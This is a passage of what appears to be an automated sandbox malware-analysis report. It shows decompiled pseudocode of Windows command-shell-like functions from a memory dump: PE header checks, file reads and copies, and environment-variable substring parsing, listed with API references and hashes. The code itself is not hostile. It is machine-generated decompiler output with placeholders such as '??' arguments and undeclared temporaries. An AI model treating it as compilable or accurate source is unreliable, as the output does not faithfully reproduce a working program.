				char _v100;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t12;
				signed int _t15;
				signed short _t23;
				signed short* _t31;
				signed int _t32;
				void* _t42;
				void* _t43;
				signed int _t44;

				_t41 = __edx;
				_t12 =  *0x35d0b4; // 0xd59bd0e8
				_v8 = _t12 ^ _t44;
				_t42 = 0;
				_t32 = 0;
				if(__ecx != 0) {
					_t43 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0x80, 0);
					if(_t43 == 0xffffffff) {
						L16:
						_t15 = _t32;
						goto L17;
					}
					_t41 =  &_v76;
					if(E00355768(_t43,  &_v76, 0x40) != 0 && 0x5a4d == _v76 && SetFilePointer(_t43, _v16, 0, 0) != 0xffffffff) {
						_t41 =  &_v100;
						if(E00355768(_t43,  &_v100, 4) != 0 && _v100 == 0x4550) {
							_t41 =  &_v96;
							if(E00355768(_t43,  &_v96, 0x14) != 0) {
								_t23 = _v80;
								if(_t23 != 0) {
									_t42 = HeapAlloc(GetProcessHeap(), 8, _t23 & 0x0000ffff);
									if(_t42 != 0) {
										_t41 = _t42;
										if(E00355768(_t43, _t42, _v80 & 0x0000ffff) != 0) {
											_t41 = _t42;
											_t31 = E0035573B(_v96, _t42);
											if(_t31 != 0) {
												_t32 =  *_t31 & 0x0000ffff;
											}
										}
										RtlFreeHeap(GetProcessHeap(), 0, _t42);
									}
								}
							}
						}
					}
					CloseHandle(_t43);
					goto L16;
				} else {
					_t15 = 0;
					L17:
					return E00346FD0(_t15, _t32, _v8 ^ _t44, _t41, _t42, _t43);
				}
			}

0x0035554f
0x00355557
0x0035555e
0x00355564
0x00355566
0x0035556a
0x0035558a
0x0035558f
0x0035564e
0x0035564e
0x00000000
0x0035564e
0x00355597
0x003555a3
0x003555cb
0x003555d7
0x003555e4
0x003555f0
0x003555f2
0x003555f9
0x0035560e
0x00355612
0x00355618
0x00355624
0x00355629
0x0035562b
0x00355632
0x00355634
0x00355634
0x00355632
0x00355641
0x00355641
0x00355612
0x003555f9
0x003555f0
0x003555d7
0x00355648
0x00000000
0x0035556c
0x0035556c
0x00355651
0x00355661
0x00355661

APIs

CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00000104), ref: 00355584
SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000000,00000000,00000040), ref: 003555BE
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,00000014,00000004), ref: 00355601
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00355608
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?), ref: 0035563A
RtlFreeHeap.NTDLL(00000000), ref: 00355641
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000,00000040), ref: 00355648

Strings

PE, xrefs: 003555D9

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: Heap$FileProcess$AllocCloseCreateFreeHandlePointer
String ID: PE
API String ID: 3093239467-4258593460
Opcode ID: b264f20425cfe16a16db7b28d6afc5b0f511ab3d6f466743033834f4f7ac7815
Instruction ID: a764fa25b2043dc3c9d32b9afd83cbfb2ea39cc483ce7d6d6325734dd7f193c4
Opcode Fuzzy Hash: b264f20425cfe16a16db7b28d6afc5b0f511ab3d6f466743033834f4f7ac7815
Instruction Fuzzy Hash: DE31F93470065497DB2367614C58F7E76BD9B88713F850205FD55DB1E0DB30DC0ACA66

Uniqueness

Uniqueness Score: -1.00%

Function 003584FE, Relevance: 13.6, APIs: 9, Instructions: 96
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E003584FE(void* __eax, void* __edx, void* __eflags, DWORD* _a4, intOrPtr _a8, long _a12) {
				char _v8;
				void* __ecx;
				void* _t12;
				void* _t14;
				LONG* _t15;
				void* _t19;
				void* _t21;
				void* _t23;
				void** _t24;
				void** _t26;
				void* _t38;
				void* _t39;
				void* _t41;
				DWORD* _t42;
				LONG* _t44;
				void* _t45;

				_t24 = _t26;
				_t39 = __edx;
				__imp___get_osfhandle( *_t24, _t38, _t41, _t23, _t26);
				FlushFileBuffers(__eax);
				_t28 =  *_t24;
				E0033DB92( *_t24);
				_t30 = E00335DB5(_t39, 0, _t28, _t28);
				 *_t24 = _t30;
				if(_t30 != 0xffffffff) {
					_t42 = _a4;
					_t12 =  ~_t42;
					__imp___get_osfhandle(2);
					SetFilePointer(_t12, _t30, _t12, 0);
					_t14 =  &_v8;
					__imp___get_osfhandle(0);
					_t15 = ReadFile(_t14,  *_t24, _a12, _t42, _t14);
					if(_t15 != 0) {
						if(_v8 != _t42) {
							goto L3;
						} else {
							_push(_t42);
							_push(_a12);
							_push(_a8);
							L003482C7();
							_t30 =  *_t24;
							_t45 = _t45 + 0xc;
							_t44 = _t15;
							E0033DB92( *_t24);
							if(_t44 != 0) {
								goto L4;
							} else {
								_t21 = E00335DB5(_t39, 1, _t39, _t39);
								 *_t24 = _t21;
								if(_t21 == 0xffffffff) {
									goto L1;
								} else {
									__imp___get_osfhandle(2);
									SetFilePointer(_t21, _t21, _t44, _t44);
									_t19 = 0;
								}
							}
						}
					} else {
						L3:
						_t30 =  *_t24;
						E0033DB92( *_t24);
						L4:
						 *_t24 =  *_t24 | 0xffffffff;
						goto L1;
					}
				} else {
					L1:
					E0033C5A2(_t30, 0x4000271f, 1, _t39);
					_t19 = 1;
				}
				return _t19;
			}

0x00358505
0x00358509
0x0035850d
0x00358515
0x0035851b
0x0035851d
0x0035852d
0x0035852f
0x00358534
0x0035854e
0x00358557
0x0035855b
0x00358563
0x0035856b
0x00358575
0x0035857d
0x00358585
0x00358596
0x00000000
0x00358598
0x00358598
0x00358599
0x0035859c
0x0035859f
0x003585a4
0x003585a6
0x003585a9
0x003585ab
0x003585b2
0x00000000
0x003585b4
0x003585bb
0x003585c0
0x003585c5
0x00000000
0x003585cb
0x003585d0
0x003585d8
0x003585de
0x003585de
0x003585c5
0x003585b2
0x00358587
0x00358587
0x00358587
0x00358589
0x0035858e
0x0035858e
0x00000000
0x0035858e
0x00358536
0x00358536
0x0035853e
0x00358548
0x00358548
0x003585e6

APIs

_get_osfhandle.MSVCRT ref: 0035850D
FlushFileBuffers.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00358CE3,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00358515

Part of subcall function 0033DB92: _close.MSVCRT ref: 0033DBC1

_get_osfhandle.MSVCRT ref: 0035855B
SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?,?,?,?,?,00000000,00000000), ref: 00358563
_get_osfhandle.MSVCRT ref: 00358575
ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?,?,?,?,00000000,00000000), ref: 0035857D
memcmp.MSVCRT ref: 0035859F
_get_osfhandle.MSVCRT ref: 003585D0
SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003585D8

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: File_get_osfhandle$Pointer$BuffersFlushRead_closememcmp
String ID:
API String ID: 332413853-0
Opcode ID: c72a119e71661e75d9a953e45ee3b9274004f93acc09d338b949a75ff93542aa
Instruction ID: 1e55b2f62293ecf33ae39fb4a5314555786b82eeb603a5c15723a0625b3e8fdd
Opcode Fuzzy Hash: c72a119e71661e75d9a953e45ee3b9274004f93acc09d338b949a75ff93542aa
Instruction Fuzzy Hash: 9E21A271600110ABDF265F65DC4DF7A7BADEF86321F104A29F919DA1E0EE705C048651

Uniqueness

Uniqueness Score: -1.00%

Function 003381E0, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 253
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E003381E0(intOrPtr _a4, long _a8, signed int* _a16) {
				signed int _v8;
				void* _v12;
				int _v20;
				char _v24;
				int _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				void _v548;
				void* _v552;
				long _v556;
				char _v560;
				int _v564;
				void* _v568;
				void* _v572;
				void* _v580;
				void _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				long _v1104;
				void* _v1108;
				void* _v1112;
				void* _v1120;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t93;
				long _t95;
				signed int _t97;
				signed int _t111;
				WCHAR* _t117;
				void* _t119;
				signed int _t120;
				WCHAR* _t122;
				int _t123;
				signed char* _t126;
				WCHAR* _t127;
				WCHAR* _t129;
				signed int _t134;
				WCHAR* _t135;
				void* _t136;
				char _t140;
				void* _t141;
				signed int* _t142;
				signed int _t153;
				signed int _t164;
				intOrPtr _t167;
				void* _t168;
				long _t169;
				WCHAR* _t170;
				char _t172;
				void* _t173;
				signed int _t174;
				signed int _t176;
				signed int _t178;

				_t176 = (_t174 & 0xfffffff8) - 0x44c;
				_t93 =  *0x35d0b4; // 0xd59bd0e8
				_v8 = _t93 ^ _t176;
				_t95 = _a8;
				_t142 = _a16;
				_v1104 = _t95;
				_v1096 =  *(_t95 + 2) & 0x0000ffff;
				_t140 = 1;
				_t97 =  *_t142;
				_v1088 = _t142;
				_v560 = 1;
				_t167 = _a4;
				_t172 = 0;
				_v1100 = _t97 & 0x00002000;
				_v1092 = _t97 & 0x00000800;
				_v556 = 0x104;
				_v564 = 0;
				memset( &_v1084, 0, 0x104);
				_v28 = 0;
				_v24 = 1;
				_v20 = 0x104;
				memset( &_v548, 0, 0x104);
				_t178 = _t176 + 0x18;
				if(E00340C70( &_v1084, 0x7fe9) < 0 || E00340C70( &_v548, 0x7fe9) < 0) {
					L23:
					_t172 = _t140;
					goto L24;
				} else {
					if(_v1100 != 0 || _v1092 != 0 ||  *((char*)(_t167 + 0x11)) != 0) {
						L6:
						_t161 = _v1104;
						if(( *(_t161 + 4) & 0x00000010) != 0) {
							L24:
							_t140 = _t172;
							L25:
							_t172 = _t140;
							L26:
							_t140 = _t172;
							L27:
							_t172 = _t140;
							L17:
							__imp__??_V@YAXPAX@Z(_v28);
							__imp__??_V@YAXPAX@Z(_v564);
							_pop(_t168);
							_pop(_t173);
							_pop(_t141);
							return E00346FD0(_t172, _t141, _v8 ^ _t178, _t161, _t168, _t173);
						}
						_t151 = _v564;
						if(_v564 == 0) {
							_t151 =  &_v1084;
						}
						_t111 = _t161 + 0x30 + (_v1096 & 0x0000ffff) * 2;
						_t161 = _v556;
						_v1096 = _t111;
						if(E003451C9(_t151, _v556,  *((intOrPtr*)(_t167 + 4)), _t111) != 0) {
							_push(_v1096);
							E0033C5A2(_t151, 0x400023da, 2,  *((intOrPtr*)(_t167 + 4)));
							_t178 = _t178 + 0x10;
							goto L25;
						} else {
							_t152 = _v28;
							if(_v28 == 0) {
								_t152 =  &_v548;
							}
							_t163 = _v20;
							if(E003451C9(_t152, _v20,  *((intOrPtr*)(_t167 + 4)), _v1104 + 0x30) != 0) {
								_t117 = _v564;
								__eflags = _t117;
								if(_t117 == 0) {
									_t117 =  &_v1084;
								}
								_t153 =  &_v548;
								E00340D89(_t163, _t117);
							}
							if(_v1092 != _t172) {
								_t153 = _v28;
								__eflags = _t153;
								if(_t153 == 0) {
									_t153 =  &_v548;
								}
								_t161 = 0x232c;
								_t119 = E00359583(_t153, 0x232c, 0x2328);
								__eflags = _t119 - _t140;
								if(_t119 == _t140) {
									goto L12;
								} else {
									__eflags =  *0x35d544 - _t172; // 0x0
									if(__eflags == 0) {
										goto L26;
									}
									goto L25;
								}
							} else {
								L12:
								_t120 = _v1088;
								_t169 = _v1104;
								_t164 =  *(_t169 + 4);
								_t154 = _t153 & 0xffffff00 | ( *_t120 & 0x00001000) != 0x00000000;
								if(((_t120 & 0xffffff00 | (_t164 & 0x00000001) != 0x00000000) & (_t153 & 0xffffff00 | ( *_t120 & 0x00001000) != 0x00000000)) != 0) {
									_t122 = _v564;
									__eflags = _t122;
									if(_t122 == 0) {
										_t122 =  &_v1084;
									}
									_t161 = _t164 & 0xfffffffe;
									_t123 = SetFileAttributesW(_t122, _t164 & 0xfffffffe);
									__eflags = _t123;
									if(_t123 != 0) {
										goto L13;
									} else {
										_push(_t172);
										_push(GetLastError());
										E0033C5A2(_t154);
										goto L27;
									}
								}
								L13:
								_t155 = _v28;
								if(_v28 == 0) {
									_t155 =  &_v548;
								}
								_t161 =  *(_t169 + 4);
								if(E003383F2(_t155,  *(_t169 + 4)) != 0) {
									_t155 = _v564;
									__eflags = _v564;
									if(_v564 == 0) {
										_t155 =  &_v1084;
									}
									_t161 =  *(_t169 + 4);
									_t170 = E003383F2(_t155,  *(_t169 + 4));
									__eflags = _t170;
									if(_t170 == 0) {
										goto L15;
									} else {
										__eflags = _t170 - 0x4d3;
										if(_t170 == 0x4d3) {
											goto L27;
										}
										_t129 = _v28;
										__eflags = _t129;
										if(_t129 == 0) {
											_t129 =  &_v548;
										}
										E003425D9(L"%s\r\n");
										E0033C5A2(_t155, _t170, _t172, _t129);
										_t178 = _t178 + 0x10;
										goto L17;
									}
								} else {
									L15:
									_t126 = _v1088;
									_t126[0x60] = _t126[0x60] + 1;
									if( *0x373cc9 != 0 && ( *_t126 & 0x00000010) != 0) {
										_t127 = _v28;
										__eflags = _t127;
										if(_t127 == 0) {
											_t127 =  &_v548;
										}
										E0033C108(_t155, 0x400023a1, _t140, _t127);
										_t178 = _t178 + 0xc;
									}
									goto L17;
								}
							}
						}
					} else {
						_t134 = E00338512( *((intOrPtr*)(_t167 + 8)),  *((intOrPtr*)(_t167 + 0xc)));
						_v1100 = _t134;
						if(_t134 != 0) {
							_t159 = _v564;
							__eflags = _v564;
							if(_v564 == 0) {
								_t159 =  &_v1084;
							}
							_t161 = _v556;
							_t135 = E003451C9(_t159, _v556,  *((intOrPtr*)(_t167 + 4)), _t134);
							__eflags = _t135;
							if(_t135 == 0) {
								_t160 = _v564;
								 *((char*)(_t167 + 0x11)) = _t140;
								__eflags = _v564;
								if(_v564 == 0) {
									_t160 =  &_v1084;
								}
								_t161 = 0x234e;
								_t136 = E00359583(_t160, 0x234e, 0x2328);
								__eflags = _t136 - _t140;
								if(_t136 != _t140) {
									goto L23;
								} else {
									goto L6;
								}
							} else {
								_push(_v1100);
								E0033C5A2(_t159, 0x400023da, 2,  *((intOrPtr*)(_t167 + 4)));
								_t178 = _t178 + 0x10;
								goto L23;
							}
						}
						goto L6;
					}
				}
			}

0x003381e8
0x003381ee
0x003381f5
0x003381fc
0x003381ff
0x00338202
0x0033820c
0x00338210
0x00338211
0x00338213
0x0033821f
0x00338227
0x0033822a
0x0033822c
0x0033823b
0x00338240
0x0033824d
0x00338254
0x0033825c
0x00338268
0x0033826f
0x00338280
0x00338285
0x00338298
0x003501dd
0x003501dd
0x00000000
0x003382b7
0x003382bb
0x003382e0
0x003382e0
0x003382e8
0x003501df
0x003501df
0x003501e1
0x003501e1
0x003501e3
0x003501e3
0x003501e5
0x003501e5
0x003383b4
0x003383bb
0x003383c9
0x003383d9
0x003383da
0x003383db
0x003383e6
0x003383e6
0x003382ee
0x003382f7
0x00350216
0x00350216
0x00338307
0x0033830a
0x00338315
0x00338320
0x0035021f
0x0035022d
0x00350232
0x00000000
0x00338326
0x00338326
0x0033832f
0x00350237
0x00350237
0x00338339
0x0033834e
0x00350243
0x0035024a
0x0035024c
0x0035024e
0x0035024e
0x00350253
0x0035025a
0x0035025a
0x00338358
0x00350264
0x0035026b
0x0035026d
0x0035026f
0x0035026f
0x0035027b
0x00350280
0x00350285
0x00350287
0x00000000
0x0035028d
0x0035028d
0x00350293
0x00000000
0x00000000
0x00000000
0x00350299
0x0033835e
0x0033835e
0x0033835e
0x00338362
0x0033836c
0x0033836f
0x0033837a
0x0035029e
0x003502a5
0x003502a7
0x003502a9
0x003502a9
0x003502ad
0x003502b2
0x003502b8
0x003502ba
0x00000000
0x003502c0
0x003502c0
0x003502c7
0x003502c8
0x00000000
0x003502ce
0x003502ba
0x00338380
0x00338380
0x00338389
0x003383e9
0x003383e9
0x0033838b
0x00338395
0x003502d4
0x003502db
0x003502dd
0x003502df
0x003502df
0x003502e3
0x003502eb
0x003502ed
0x003502ef
0x00000000
0x003502f5
0x003502f5
0x003502fb
0x00000000
0x00000000
0x00350301
0x00350308
0x0035030a
0x0035030c
0x0035030c
0x00350319
0x00350320
0x00350325
0x00000000
0x00350325
0x0033839b
0x0033839b
0x0033839b
0x0033839f
0x003383a9
0x0035032d
0x00350334
0x00350336
0x00350338
0x00350338
0x00350346
0x0035034b
0x0035034b
0x00000000
0x003383a9
0x00338395
0x00338358
0x003382c9
0x003382cf
0x003382d4
0x003382da
0x003501a4
0x003501ab
0x003501ad
0x003501af
0x003501af
0x003501b3
0x003501be
0x003501c3
0x003501c5
0x003501ec
0x003501f3
0x003501f6
0x003501f8
0x003501fa
0x003501fa
0x00350203
0x00350208
0x0035020d
0x0035020f
0x00000000
0x00350211
0x00000000
0x00350211
0x003501c7
0x003501c7
0x003501d5
0x003501da
0x00000000
0x003501da
0x003501c5
0x00000000
0x003382da
0x003382bb

APIs

memset.MSVCRT ref: 00338254
memset.MSVCRT ref: 00338280

Part of subcall function 00340C70: ??_V@YAXPAX@Z.MSVCRT ref: 00340CBA
Part of subcall function 00340C70: memset.MSVCRT ref: 00340CDD

??_V@YAXPAX@Z.MSVCRT ref: 003383BB
??_V@YAXPAX@Z.MSVCRT ref: 003383C9

Strings

%s, xrefs: 00350314

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: memset
String ID: %s
API String ID: 2221118986-3043279178
Opcode ID: 765acfa5812fded5fb8a8fede35ceb2ddb90d531476877bedd06d99a202013e8
Instruction ID: b136114adc1ef24c3b9a26da34f5af50cee577ee72d3a016417626da7f4ef0b5
Opcode Fuzzy Hash: 765acfa5812fded5fb8a8fede35ceb2ddb90d531476877bedd06d99a202013e8
Instruction Fuzzy Hash: B591ADB52083419BD736DF14C885F6BB7E4BF84711F05491DF9898B261DB35EA08CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00338F70, Relevance: 12.4, APIs: 8, Instructions: 447
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E00338F70(signed int __ecx, wchar_t* __edx, void* __eflags, signed int* _a4, intOrPtr _a8) {
				void* _v8;
				signed int _v12;
				char _v20;
				wchar_t* _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				signed int _v48;
				wchar_t* _v52;
				signed int _v56;
				int _v60;
				wchar_t* _v64;
				intOrPtr _v68;
				signed int _v72;
				int _v76;
				signed short* _v80;
				void* _v84;
				signed short* _v88;
				signed short* _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				signed short* _v104;
				void* __edi;
				void* __ebp;
				signed int _t127;
				int _t130;
				signed int* _t131;
				intOrPtr* _t135;
				signed int _t139;
				intOrPtr _t142;
				intOrPtr _t143;
				short* _t144;
				intOrPtr _t145;
				intOrPtr _t146;
				signed short* _t149;
				wchar_t* _t150;
				intOrPtr _t152;
				intOrPtr _t153;
				intOrPtr _t154;
				intOrPtr _t155;
				intOrPtr _t156;
				intOrPtr _t157;
				signed int _t158;
				signed short* _t162;
				void _t163;
				signed int _t165;
				intOrPtr _t167;
				signed int _t171;
				signed int _t173;
				signed short* _t175;
				intOrPtr* _t176;
				signed int _t178;
				signed int _t179;
				signed int _t180;
				intOrPtr _t181;
				signed short* _t190;
				wchar_t* _t191;
				intOrPtr* _t192;
				intOrPtr* _t195;
				signed int _t197;
				void* _t198;
				void* _t199;
				intOrPtr* _t203;
				intOrPtr* _t206;
				intOrPtr* _t209;
				void* _t212;
				intOrPtr* _t213;
				signed int _t219;
				signed short* _t220;
				signed short* _t226;
				signed short* _t228;
				wchar_t* _t229;
				short* _t230;
				void* _t231;
				void* _t232;
				intOrPtr* _t233;
				signed short* _t237;
				void* _t240;
				void* _t241;
				void* _t242;
				void* _t243;
				signed short* _t244;
				signed short* _t247;
				wchar_t* _t252;
				WCHAR* _t254;
				void* _t255;
				signed int _t256;
				intOrPtr* _t258;
				signed int _t260;
				void* _t262;
				intOrPtr* _t265;
				signed int _t267;
				signed int _t268;
				intOrPtr* _t269;
				signed short* _t270;
				signed short* _t271;
				signed short* _t272;
				signed short* _t273;
				intOrPtr _t276;
				signed int _t277;
				void* _t278;
				void* _t279;
				void* _t282;

				_t229 = __edx;
				_push(0xfffffffe);
				_push(0x35be58);
				_push(E00347290);
				_push( *[fs:0x0]);
				_t279 = _t278 - 0x54;
				_t127 =  *0x35d0b4; // 0xd59bd0e8
				_v12 = _v12 ^ _t127;
				_push(_t127 ^ _t277);
				 *[fs:0x0] =  &_v20;
				_v52 = __edx;
				_v56 = __ecx;
				_v60 = 0;
				_t252 = 0;
				_v40 = 0;
				_t262 = 0;
				_v36 = 0;
				_v8 = 0;
				_t130 = E003400B0(0x4000);
				_v60 = _t130;
				if(_t130 == 0) {
					_t171 = _v56;
					if(_t171 == 0) {
						L74:
						_t131 = _a4;
						L75:
						 *_t131 = 0;
						L23:
						_v8 = 0xfffffffe;
						E003393F4(_t252);
						 *[fs:0x0] = _v20;
						return _t262;
					}
					__imp__longjmp(_t171, 0xffffffff);
					L91:
					_t173 = _v56;
					if(_t173 == 0) {
						L73:
						_t262 = _v36;
						goto L74;
					}
					__imp__longjmp(_t173, 0xffffffff);
					L93:
					_t230 = _t229 - 2;
					_v64 = _t230;
					_v68 = _t173 - 1;
					L20:
					 *_t230 = 0;
					_t175 = _v52;
					_t254 = _v40;
					L21:
					_t135 = _v32;
					_v32 = _t135 + 2;
					_t255 = E0033CFBC(_t254);
					_v44 = _t255;
					if( *_t135 == 0x3a) {
						if( *0x373cc9 == 0 || _t255 == 0) {
							goto L22;
						} else {
							_t190 = _v32;
							_t139 =  *_t190 & 0x0000ffff;
							if(_t139 == 0x7e) {
								_t191 =  &(_t190[1]);
								_v32 = _t191;
								_t256 = wcstol(_t191,  &_v32, 0);
								_v72 = _t256;
								_t176 = _v44;
								if(_t256 >= 0) {
									L50:
									_t192 = _t176;
									_t66 = _t192 + 2; // 0x347292
									_t231 = _t66;
									do {
										_t142 =  *_t192;
										_t192 = _t192 + 2;
									} while (_t142 != 0);
									if(_t256 >= _t192 - _t231 >> 1) {
										_t195 = _t176;
										_t109 = _t195 + 2; // 0x347292
										_t232 = _t109;
										do {
											_t143 =  *_t195;
											_t195 = _t195 + 2;
										} while (_t143 != 0);
										_t197 = _t195 - _t232 >> 1;
										L54:
										if(_t197 < 0) {
											_t256 = 0;
											L58:
											_v72 = _t256;
											_t144 = _v32;
											if( *_t144 != 0x2c) {
												_t257 = _t176 + _t256 * 2;
												_t265 = _t176 + _t256 * 2;
												_t104 = _t265 + 2; // 0x2
												_t198 = _t104;
												do {
													_t145 =  *_t265;
													_t265 = _t265 + 2;
												} while (_t145 != 0);
												L72:
												_t267 = _t265 - _t198 >> 1;
												L63:
												_v48 = _t267;
												_t233 = _t176;
												_t78 = _t233 + 2; // 0x347292
												_t199 = _t78;
												do {
													_t146 =  *_t233;
													_t233 = _t233 + 2;
												} while (_t146 != 0);
												_t255 = _v44;
												E00346826(_t255, (_t233 - _t199 >> 1) + 1, _t257, _t267);
												if( *((short*)(_t255 + _t267 * 2)) != 0) {
													 *((short*)(_t255 + _t267 * 2)) = 0;
												}
												_t149 = _v32;
												_t237 =  &(_t149[1]);
												_v32 = _t237;
												_t131 = _a4;
												if(( *_t149 & 0x0000ffff) != _a8) {
													L98:
													_t262 = _v36;
													_t252 = _v40;
													goto L75;
												} else {
													 *_t131 = _t237 - _v52 >> 1;
													L45:
													_t262 = _t255;
													_v36 = _t262;
													_t252 = _v40;
													goto L23;
												}
											}
											_t150 = _t144 + 2;
											_v32 = _t150;
											_t268 = wcstol(_t150,  &_v32, 0);
											_v48 = _t268;
											if(_t268 < 0) {
												_t203 = _t176 + _t256 * 2;
												_t240 = _t203 + 2;
												do {
													_t152 =  *_t203;
													_t203 = _t203 + 2;
												} while (_t152 != 0);
												_t267 = _t268 + (_t203 - _t240 >> 1);
												_v48 = _t267;
												if(_t267 < 0) {
													_t267 = 0;
												}
											}
											_v48 = _t267;
											_t257 = _t176 + _t256 * 2;
											_t206 = _t257;
											_t76 = _t206 + 2; // 0x2
											_t241 = _t76;
											do {
												_t153 =  *_t206;
												_t206 = _t206 + 2;
											} while (_t153 != 0);
											if(_t267 >= _t206 - _t241 >> 1) {
												_t269 = _t257;
												_t99 = _t269 + 2; // 0x2
												_t198 = _t99;
												do {
													_t154 =  *_t269;
													_t269 = _t269 + 2;
												} while (_t154 != 0);
												goto L72;
											}
											goto L63;
										}
										_t209 = _t176;
										_t67 = _t209 + 2; // 0x347292
										_t242 = _t67;
										do {
											_t155 =  *_t209;
											_t209 = _t209 + 2;
										} while (_t155 != 0);
										if(_t256 >= _t209 - _t242 >> 1) {
											_t258 = _t176;
											_t110 = _t258 + 2; // 0x347292
											_t212 = _t110;
											do {
												_t156 =  *_t258;
												_t258 = _t258 + 2;
											} while (_t156 != 0);
											_t256 = _t258 - _t212 >> 1;
										}
										goto L58;
									}
									_t197 = _t256;
									goto L54;
								}
								_t213 = _t176;
								_t64 = _t213 + 2; // 0x347292
								_t243 = _t64;
								do {
									_t157 =  *_t213;
									_t213 = _t213 + 2;
								} while (_t157 != 0);
								_t256 = _t256 + (_t213 - _t243 >> 1);
								_v72 = _t256;
								goto L50;
							}
							if(_t139 == 0x2a) {
								_t190 =  &(_t190[1]);
								_v32 = _t190;
								_v76 = 1;
							} else {
								_v76 = 0;
							}
							_t270 = _t190;
							_v104 = _t270;
							_t244 = _t270;
							while(1) {
								_t158 =  *_t190 & 0x0000ffff;
								if(_t158 == 0 || _t158 == 0x3d) {
									break;
								}
								_t190 =  &(_t244[1]);
								_v32 = _t190;
								_t244 = _t190;
							}
							if( *_t190 == 0) {
								L100:
								_t252 = _v40;
								goto L73;
							}
							_t178 = _t244 - _t270;
							_t179 = _t178 >> 1;
							if(_t178 == 0) {
								_t180 = _v56;
								if(_t180 == 0) {
									goto L100;
								}
								E0033C5A2(_t190, 0x234a, 1, _t244);
								_t282 = _t279 + 0xc;
								__imp__longjmp(_t180, 0xffffffff);
								L103:
								_t255 = _v44;
								memcpy(_t255, ??, ??);
								E00341040(_v56 + _v56 + _t255, 0x2000 - _v56, _t270);
								goto L45;
							}
							_t162 =  &(_t244[1]);
							_t271 = _t162;
							_v80 = _t271;
							while(1) {
								_t247 = _t162;
								_v32 = _t162;
								_t219 =  *_t162 & 0x0000ffff;
								if(_t219 == 0 || _t219 == _a8) {
									break;
								}
								_t162 =  &(_t247[1]);
							}
							_t131 = _a4;
							if( *_t162 == 0) {
								goto L98;
							}
							_t220 =  &(_t247[1]);
							_v32 = _t220;
							_v56 = _t247 - _t271 >> 1;
							 *_t131 = _t220 - _v52 >> 1;
							if( *_t255 == 0) {
								goto L45;
							}
							_t272 = _v60;
							_t163 = E00341040(_t272, 0x2000, _t255);
							_v88 = _t272;
							_v84 = _t255;
							while(1) {
								L42:
								__imp___wcsnicmp(_t272, _v104, _t179);
								_t282 = _t279 + 0xc;
								if(_t163 != 0) {
									break;
								}
								_t270 =  &(_t272[_t179]);
								_push(_v56 + _v56);
								_push(_v80);
								if(_v76 != 0) {
									goto L103;
								}
								_t163 = memcpy(_t255, ??, ??);
								_t279 = _t282 + 0xc;
								_t255 = _t255 + _v56 * 2;
								_v84 = _t255;
								_v88 = _t270;
							}
							_t163 =  *_t272 & 0x0000ffff;
							 *_t255 = _t163;
							_t255 = _t255 + 2;
							_v84 = _t255;
							_t272 =  &(_t272[1]);
							_v88 = _t272;
							if(_t163 != 0) {
								goto L42;
							}
							_t255 = _v44;
							goto L45;
						}
					}
					L22:
					 *_a4 = _v32 - _t175 >> 1;
					_t262 = _t255;
					_v36 = _t262;
					_t252 = _v40;
					goto L23;
				}
				_t226 = __edx;
				_v32 = __edx;
				_t273 = __edx;
				_t229 =  *0x373cc9;
				while(1) {
					_t165 =  *_t226 & 0x0000ffff;
					if(_t165 == 0) {
						break;
					}
					_t181 = _a8;
					if(_t165 == _t181 || _t229 != 0 && _t165 == 0x3a && _t226[1] != _t181) {
						break;
					} else {
						_t13 =  &(_t273[1]); // 0x2
						_t226 = _t13;
						_v32 = _t226;
						_t273 = _t226;
						continue;
					}
				}
				if( *_t226 == 0) {
					goto L73;
				}
				_t175 = _v52;
				if(_t273 == _t175) {
					goto L73;
				}
				_t276 = (_t273 - _t175 >> 1) + 1;
				_t252 = E003400B0(_t276 + _t276);
				_v40 = _t252;
				if(_t252 == 0) {
					goto L91;
				}
				_t19 = _t276 - 1; // 0x0
				_t167 = _t19;
				if(_t276 == 0) {
					goto L21;
				}
				if(_t276 > 0x7fffffff) {
					if(_t276 == 0) {
						goto L21;
					}
					L95:
					 *_t252 = 0;
					goto L21;
				}
				if(_t167 > 0x7ffffffe) {
					goto L95;
				}
				_t228 = _t175;
				_t229 = _t252;
				_t173 = 0;
				while(1) {
					_v68 = _t173;
					_v64 = _t229;
					_v96 = _t276;
